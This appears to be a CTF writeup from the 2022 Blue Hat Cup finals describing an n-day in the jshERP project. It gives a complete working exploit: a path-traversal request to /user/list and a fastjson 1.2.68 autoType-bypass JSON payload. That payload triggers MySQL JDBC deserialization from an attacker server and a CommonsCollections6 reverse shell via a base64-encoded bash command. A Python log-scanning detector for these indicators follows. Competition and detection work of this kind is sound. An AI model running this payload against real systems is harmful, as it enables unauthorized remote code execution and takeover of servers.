Blue Hat Cup (蓝帽杯) 2022 Finals - 赌怪 writeup
An n-day in an open-source project:
https://github.com/jishenghua/jshERP
There is already a very detailed analysis article:
https://www.cnblogs.com/bmjoker/p/14856437.html
but the part of that article that explains the fastjson RCE is indeed somewhat off.
The dependency given by the challenge is:
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.55</version>
</dependency>
Since this is AWDP, you can simply bisect over fastjson versions while patching to work out which version's vulnerability it is.
After a few attempts it was basically confirmed to be the 1.2.68 autoType bypass.
And the challenge has a JDBC dependency:
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>5.1.30</version>
</dependency>
The payload from this repository can be used to hit JDBC deserialization; the challenge also has a commons-collections dependency, so the CC6 chain gives a reverse shell:
https://github.com/safe6Sec/Fastjson
as well as the MySQL server:
https://github.com/dushixiang/evil-mysql-server/
Final exploit:
GET /register.html/../user/list?search=xxxx HTTP/1.1
Host: 39.105.99.40:28592
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: JSESSIONID=7C6C92CE236FFAEE4E7FC06FF8EAF933
If-Modified-Since: Fri, 29 Jul 2022 07:23:14 GMT
Connection: close
xxxx is the URL-encoded JSON:
{
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "vpsip",
    "portToConnectTo": 3306,
    "info": {
        "user": "yso_CommonsCollections6_bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}",
        "password": "pass",
        "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
        "autoDeserialize": "true",
        "NUM_HOSTS": "1"
    },
    "databaseToConnectTo": "dbname",
    "url": ""
}
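For the defensive half of an AWDP round, the request above is also what you want to be able to spot in access logs or in a request filter. The following Python script is an added example (not part of the original writeup or of the jshERP project): it pulls the `search` parameter out of a request line, URL-decodes it, and parses the JSON while keeping duplicate keys, because Python's default `json.loads` silently keeps only the last `@type` and would hide the two-`@type` trick the payload relies on. It then reports the indicators visible in the payload above (the `AutoCloseable` / `JDBC4Connection` types and the `autoDeserialize` / `statementInterceptors` connection properties). The sample request line and the `vpsip` host are constructed; this is a log-review aid, not a substitute for upgrading fastjson and keeping autoType disabled.

```python
import json
from urllib.parse import urlsplit, parse_qs, quote

# Indicators taken from the payload shown in the writeup above.
SUSPECT_TYPES = ("java.lang.AutoCloseable", "com.mysql.jdbc.JDBC4Connection")
SUSPECT_JDBC_KEYS = ("autoDeserialize", "statementInterceptors")


class JsonObject(list):
    """A JSON object kept as an ordered list of (key, value) pairs, duplicates included."""


def parse_keep_duplicates(text):
    """json.loads normally collapses duplicate keys; object_pairs_hook preserves them."""
    return json.loads(text, object_pairs_hook=JsonObject)


def walk_objects(node):
    """Yield every JSON object in the parsed tree, depth first."""
    if isinstance(node, JsonObject):
        yield node
        for _, value in node:
            yield from walk_objects(value)
    elif isinstance(node, list):  # a plain JSON array
        for item in node:
            yield from walk_objects(item)


def find_indicators(tree):
    """Return human-readable indicator strings found anywhere in the parsed JSON."""
    hits = []
    for obj in walk_objects(tree):
        type_values = [v for k, v in obj if k == "@type"]
        if len(type_values) > 1:
            hits.append("duplicate @type keys in one object: %s" % type_values)
        for t in type_values:
            if t in SUSPECT_TYPES:
                hits.append("suspicious @type: " + t)
        for k, _ in obj:
            if k in SUSPECT_JDBC_KEYS:
                hits.append("JDBC deserialization property: " + k)
    return hits


def check_request_line(request_line):
    """Inspect the 'search' query parameter of an HTTP request line; returns indicators or []."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return []  # not a well-formed request line
    hits = []
    # parse_qs percent-decodes the value, so the JSON text comes back as written.
    for value in parse_qs(urlsplit(target).query).get("search", []):
        stripped = value.lstrip()
        if not stripped.startswith("{"):
            continue  # ordinary search strings are not JSON objects
        try:
            tree = parse_keep_duplicates(stripped)
        except ValueError:
            continue  # unparsable JSON: nothing to inspect here
        hits.extend(find_indicators(tree))
    return hits


# Constructed sample: the writeup's payload (with a placeholder user) URL-encoded
# into a request line, plus a harmless search for comparison.
SAMPLE_PAYLOAD = (
    '{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection",'
    '"hostToConnectTo":"vpsip","portToConnectTo":3306,'
    '"info":{"user":"placeholder","password":"pass",'
    '"statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",'
    '"autoDeserialize":"true","NUM_HOSTS":"1"},'
    '"databaseToConnectTo":"dbname","url":""}'
)
SAMPLE_REQUEST = "GET /register.html/../user/list?search=" + quote(SAMPLE_PAYLOAD) + " HTTP/1.1"
BENIGN_REQUEST = "GET /user/list?search=%7B%22name%22%3A%22alice%22%7D HTTP/1.1"

if __name__ == "__main__":
    for line in (SAMPLE_REQUEST, BENIGN_REQUEST):
        print(line[:60] + "... ->", check_request_line(line) or "clean")
```

Run over a real access log, each line's request field would go through `check_request_line`; the duplicate-`@type` indicator is the most specific one, since legitimate clients have no reason to send the same key twice in one object.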